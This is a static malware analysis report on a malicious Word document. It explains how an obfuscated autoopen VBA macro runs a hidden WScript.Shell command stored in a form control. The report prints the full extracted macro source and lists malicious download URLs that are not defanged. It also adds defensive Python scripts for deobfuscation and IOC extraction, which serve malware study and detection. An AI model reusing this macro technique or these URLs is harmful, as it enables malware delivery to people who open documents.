Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7ecb23d000869ed9…

MALICIOUS

Office (OLE)

Size: 64.0 KB
Created: 2019-01-16 21:24:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: b34e47f4a9c90aee43a9096e64eb881a
SHA-1: 4aa5d5b5ea7f7948ac779ae3968ff25cd664bafa
SHA-256: 7ecb23d000869ed97dd1329b4989c29109cb1d0c336836258cb39f21570a9433
Risk Score: 290

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1203 Exploitation for Client Execution. Nothing in the findings below supports T1203: every finding is macro execution, and the WordBasic heuristic itself states that it is not a parser-CVE attribution, so the trigger is better described as the user enabling macros (T1204.002, User Execution: Malicious File).

The file contains a VBA project with an autoopen Sub, which Word runs when the document is opened with macros enabled. That Sub does nothing visible itself: it builds an Array(...) whose elements are junk variable names plus the function reciprocal90, and naming a Function inside an expression calls it, so reciprocal90 is the real entry point. reciprocal90 is padded with Select Case blocks over variables that are never assigned, and the few statements that matter sit between them. They assemble the string "WscRipt.sHeLl" (the variables concatenated around the literal are unassigned Variants, which are Empty and add nothing; ProgIDs are case-insensitive, so this is WScript.Shell, the Windows Script Host shell object), pass it to CreateObject, and call .Run on the result. The command line handed to Run is not present in the macro source: it is read from initiatives70.TextBox1, a TextBox control of the document module (see the VB_Control attribute in the extracted source), and the second argument, PGWAhWwuk, is set to 0, the window-style value for a hidden window. The macro therefore executes a hidden, attacker-supplied command stored in the document rather than in the code. The URLs recovered from the document body are consistent with that command downloading and running a second-stage payload, but the report locates the URLs in document text, not in the macro, so the link between the two is inferred rather than observed.
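The resolution described above can be done mechanically. The following is an added example, not code from this report or from its analysis pipeline: a small Python triage script that strips the junk Select Case padding, evaluates the "+" concatenations the way VBA does when the names involved are never assigned, and reports the resolved ProgID, where the Run command line comes from, the window style, and the autoopen -> reciprocal90 call chain. Its input is a constructed excerpt of the macros.bas shown later on the page; the function names and output fields are this example's own.

```python
import re
from typing import Dict, List

# Constructed input: the execution-relevant statements from the macros.bas extracted
# on this page, with the junk Select Case padding cut down to one block for brevity.
SAMPLE_VBA = '''
Attribute VB_Name = "olive13"
Function reciprocal90()
On Error Resume Next
   Select Case Rubber92
         Case 210
            Rubber87 = CLng(641)
            pixel78 = CDate(Island53)
 End Select
XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82
PGWAhWwuk = 0
indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)
End Function

Attribute VB_Name = "Marketing96"
Sub autoopen()
synergies78 = Array(Steel97, userfacing1, Park30, reciprocal90, TurkishLira30, dynamic33, wireless52)
End Sub
'''

AUTOEXEC = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(auto_?open|auto_?close|'
                      r'auto_?exec|document_open|document_close|workbook_open)\s*\(', re.I | re.M)
PROC = re.compile(r'^\s*(?:Public\s+|Private\s+)?(Sub|Function)\s+(\w+)\s*\(.*?^\s*End \1[ \t]*$',
                  re.I | re.M | re.S)
SELECT_BLOCK = re.compile(r'^\s*Select Case\b.*?^\s*End Select[ \t]*$', re.I | re.M | re.S)
INTERESTING = re.compile(r'CreateObject|GetObject|\.Run\b|\bShell\b|Environ|XMLHTTP|ADODB', re.I)
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.M)
RUN_CALL = re.compile(r'CreateObject\(([^()]*)\)\.Run!?\(([^()]*)\)', re.I)
TOKEN = re.compile(r'"(?:[^"]|"")*"|[^+"]+')          # a string literal, or text between '+' signs
STRLIT = re.compile(r'^"((?:[^"]|"")*)"$')
DOTTED = re.compile(r'^[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)+$')  # Module.Control, e.g. initiatives70.TextBox1

def strip_junk_select_blocks(src: str) -> str:
    """Drop Select Case blocks with no execution-relevant token; in this sample they are pure padding."""
    return SELECT_BLOCK.sub(lambda m: m.group(0) if INTERESTING.search(m.group(0)) else '', src)

def collect_assignments(src: str) -> Dict[str, str]:
    """Map each simple `name = expr` statement to its right-hand side (first assignment wins)."""
    env: Dict[str, str] = {}
    for m in ASSIGN.finditer(src):
        env.setdefault(m.group(1).lower(), m.group(2))
    return env

def resolve_concat(expr: str, env: Dict[str, str], depth: int = 0) -> str:
    """Evaluate a '+'-joined expression as VBA does without Option Explicit: literals keep
    their text, never-assigned names are Empty and add nothing, assigned names are resolved
    recursively, and a Module.Control reference becomes a placeholder because its value
    lives in the form/document, not in the source."""
    if depth > 8:
        return '<...>'
    out: List[str] = []
    for tok in (t.strip() for t in TOKEN.findall(expr)):
        lit = STRLIT.match(tok)
        if lit:
            out.append(lit.group(1).replace('""', '"'))
        elif tok.isdigit():
            out.append(tok)
        elif DOTTED.match(tok):
            out.append('<%s>' % tok)
        elif tok.lower() in env:
            out.append(resolve_concat(env[tok.lower()], env, depth + 1))
    return ''.join(out)

def analyze(src: str) -> dict:
    """Triage one module: auto-exec entry points, the resolved ProgID and arguments of each
    CreateObject(...).Run call, and which entry point reaches the procedure holding it."""
    cleaned = strip_junk_select_blocks(src)
    env = collect_assignments(cleaned)
    procs = {m.group(2).lower(): m.group(0) for m in PROC.finditer(cleaned)}
    autoexec = [m.group(1) for m in AUTOEXEC.finditer(cleaned)]
    run_calls, chain = [], []
    for m in RUN_CALL.finditer(cleaned):
        args = [a.strip() for a in m.group(2).split(',')]  # no commas inside literals in this sample
        command = resolve_concat(args[0], env)
        style = resolve_concat(args[1], env) if len(args) > 1 else '1'  # WshShell.Run default style
        run_calls.append({
            'progid': resolve_concat(m.group(1), env).lower(),
            'command': command,
            'command_from_control': command.startswith('<'),
            'window_style': style,
            'hidden': style == '0',  # WshShell.Run intWindowStyle 0 = hidden window
        })
        owner = next((n for n, body in procs.items() if m.group(0) in body), None)
        for entry in autoexec:   # a bare Function name inside Array(...) is a call in VBA
            if owner and re.search(r'\b%s\b' % re.escape(owner), procs.get(entry.lower(), ''), re.I):
                chain.append('%s -> %s' % (entry, owner))
    return {'autoexec': autoexec, 'run_calls': run_calls, 'entry_chain': chain}

if __name__ == '__main__':
    import json
    print(json.dumps(analyze(SAMPLE_VBA), indent=2))
```

The resolver deliberately treats any name without an assignment as Empty; that single rule collapses all of the padding identifiers and leaves the one literal that matters. Anything that resolves to a placeholder such as <initiatives70.TextBox1> is a cue to pull the control's value from the form/document streams (olevba's form-data extraction does this) before concluding what the command line is.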

Heuristics (9)

  • ClamAV: Doc.Malware.Generic-6818422-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Generic-6818422-0
  • VBA macros detected [medium; 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched line in script, with one line of context on each side:
      End Select
      XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82
      Select Case National91
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script, with one line of context on each side:
      End Select
      indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)
      Select Case payment34
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    Matched line in script, with one line of context on each side:
      Attribute VB_Name = "Marketing96"
      Sub autoopen()
      Mission97 = Research55
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. This description does not fit the sample: a VBA project was recovered (OLE_VBA_MACROS, OLE_VBA_AUTOOPEN and the extracted macros.bas below), so here the finding only restates the AutoOpen evidence and should not be weighted separately.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Both entries below are single strings from the document text (OLE body) in which several URLs are joined with "@". Because "@" is a legal character inside a URL path, the extractor reports each string as one URL, so treat every "@"-separated piece as a separate candidate download location. The first string is cut off in the report after "ftp.dailyigni".
      http://samix-num.com/BcFUhvDr@http://economiadigital.biz/NKq5eOZ@http://ftp.dailyigni (in document text, OLE body)
      http://migoshen.org/FNE1TVJjI@http://vanoostrom.org/w8yXb69h5 (in document text, OLE body)
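Added example, not part of the report: the document-body strings above are "@"-joined lists, and a generic URL regex returns each of them as a single URL because "@" is legal inside a URL path (RFC 3986 pchar). The Python script below shows that naive result, splits the lists on "@" only where a URL scheme follows, and emits de-duplicated, defanged indicators. Its input is constructed from the URLs visible in the report (the truncated third URL of the first string is left out rather than guessed); the function names are this example's own.

```python
import re
from urllib.parse import urlsplit

# Constructed input: the OLE-body strings reported above. The third URL of the first string
# is cut off in the report ("http://ftp.dailyigni"), so it is omitted here rather than guessed.
DOCUMENT_STRINGS = [
    "http://samix-num.com/BcFUhvDr@http://economiadigital.biz/NKq5eOZ",
    "http://migoshen.org/FNE1TVJjI@http://vanoostrom.org/w8yXb69h5",
]

SPLIT_BEFORE_SCHEME = re.compile(r'@(?=https?://)', re.I)

def naive_extract(text: str) -> list:
    """What a generic URL regex reports: '@' is a legal path character, so the whole
    '@'-joined string comes back as one URL, exactly as the report above shows it."""
    return re.findall(r'https?://\S+', text)

def naive_parse(url: str) -> tuple:
    """Host and path as a standards-following parser sees the joined string: the first
    host is real, and every later URL is hidden inside the path."""
    p = urlsplit(url)
    return p.hostname, p.path

def split_url_list(text: str) -> list:
    """Split an '@'-joined URL list, anchoring each split on the scheme that follows the '@'
    so that a '@' inside the path or userinfo of a single URL is not treated as a separator."""
    return [u for u in SPLIT_BEFORE_SCHEME.split(text) if u]

def defang(url: str) -> str:
    """hxxp://host[.]tld/path form for safe sharing; only the host's dots are bracketed."""
    p = urlsplit(url)
    return '%s://%s%s%s' % (p.scheme.replace('http', 'hxxp'), p.netloc.replace('.', '[.]'),
                            p.path, ('?' + p.query) if p.query else '')

def extract_iocs(strings) -> list:
    """Expand every '@'-joined list, de-duplicate, and return one record per URL."""
    seen, iocs = set(), []
    for s in strings:
        for url in split_url_list(s):
            if url in seen:
                continue
            seen.add(url)
            iocs.append({'url': url, 'host': urlsplit(url).hostname, 'defanged': defang(url)})
    return iocs

if __name__ == '__main__':
    for ioc in extract_iocs(DOCUMENT_STRINGS):
        print(ioc['host'], ioc['defanged'])
```

Splitting on a bare "@" would also break legitimate URLs that carry userinfo (http://user@host/), which is why the split is anchored on the scheme that follows; the truncated entry from the report should be handled the same way but its last piece must be marked incomplete rather than blocklisted as a host.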

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4890 bytes
SHA-256: d58bc63444b91bae6c3d43940b5e3e46ea5cdbf00509346fde36f3b1a44c9f29

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "initiatives70"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "olive13"
Function reciprocal90()
On Error Resume Next
   Select Case Rubber92
         Case 210
            Rubber87 = CLng(641)
Accountability31 = EXE10
            pixel78 = CDate(Island53)
missioncritical8 = JBOD5
            website86 = Int(743)
         Case 276
tangible46 = helpdesk94
            RefinedPlasticCar27 = Cos(Operations63)
yellow25 = Alabama24
            knowledgebase17 = ChrB(941)
            repurpose53 = paradigm7
 End Select
   Select Case redefine63
         Case 40
            invoice79 = CLng(33)
payment62 = Buckinghamshire55
            generating32 = CDate(CostaRicanColon2)
interfaces29 = FantasticFrozenSalad91
            haptic17 = Int(529)
         Case 798
Station17 = LicensedSteelKeyboard15
            program22 = Cos(Sleek66)
Openarchitected16 = hardware27
            clearthinking15 = ChrB(627)
            Ergonomic51 = Islands42
 End Select
XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82
   Select Case National91
         Case 513
            seamless79 = CLng(632)
AwesomeSteelCheese49 = backend19
            Naira33 = CDate(bypass13)
AlgerianDinar74 = digital15
            GB34 = Int(336)
         Case 187
empower61 = Dynamic58
            compress31 = Cos(Adaptive10)
magenta74 = red33
            Inlet13 = ChrB(924)
            strategy28 = driver2
 End Select
   Select Case Product94
         Case 253
            partnerships84 = CLng(216)
Borders1 = infrastructures95
            optical37 = CDate(integrate84)
Colorado48 = Quality14
            Cotton85 = Int(324)
         Case 996
transmit75 = Buckinghamshire85
            content88 = Cos(Sleek52)
Lodge63 = Solutions75
            withdrawal93 = ChrB(870)
            webreadiness94 = optical68
 End Select
PGWAhWwuk = 0
   Select Case networks98
         Case 731
            Lake74 = CLng(926)
TimorLeste71 = Stream11
            networks43 = CDate(Land74)
Wyoming85 = XML88
            Assistant69 = Int(298)
         Case 74
Ranch25 = vertical42
            GenericSteelTable27 = Cos(mindshare70)
Tala37 = platforms99
            EthiopianBirr49 = ChrB(734)
            MoneyMarketAccount17 = leadingedge96
 End Select
   Select Case deposit47
         Case 505
            Data98 = CLng(947)
Pula76 = JBOD26
            Electronics50 = CDate(Directives93)
digital61 = THX19
            Gambia17 = Int(319)
         Case 449
Ergonomic98 = quantify7
            Cotton10 = Cos(connecting16)
Berkshire9 = Clothing55
            Director47 = ChrB(366)
            syndicate95 = NewMexico87
 End Select
indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)
   Select Case payment34
         Case 187
            FantasticSteelBall12 = CLng(385)
RusticPlasticMouse34 = alarm31
            fullrange42 = CDate(Rubber80)
Officer99 = Berkshire10
            unleash32 = Int(738)
         Case 449
JSON69 = Cambridgeshire41
            RSS61 = Cos(Generic68)
FantasticGraniteGloves74 = SmallPlasticChicken28
            superstructure53 = ChrB(154)
            Avon42 = wireless14
 End Select
   Select Case streamline25
         Case 57
            r1080p8 = CLng(54)
extend65 = GenericCottonBall73
            withdrawal67 = CDate(Selfenabling50)
Toys97 = deposit30
            invoice89 = Int(805)
         Case 908
parse20 = whiteboard69
            Generic43 = Cos(Electronics91)
AntiguaandBarbuda21 = Sharable29
            withdrawal34 = ChrB(875)
            Fantastic66 = orchid16
 End Select
   Select Case Corporate43
         Case 789
            repurpose94 = CLng(703)
HandcraftedSteelShirt34 = Frozen36
            asynchronous23 = CDate(Frontline16)
COM10 = Industrial86
            AwesomeConcreteShirt37 = Int(179)
         Case 918
Cotton49 = circuit62
            multistate29 = Cos(Squares17)
directional22 = ivory47
            Granite98 = ChrB(745)
            bypass29 = Metal48
 End Select
End Function


Attribute VB_Name = "Marketing96"
Sub autoopen()
Mission97 = Research55
synergies78 = Array(Steel97, userfacing1, Park30, reciprocal90, TurkishLira30, dynamic33, wireless52)
input37 = deposit7
End Sub
Function Assistant78()
ShoesMovies40 = clientdriven19
End Function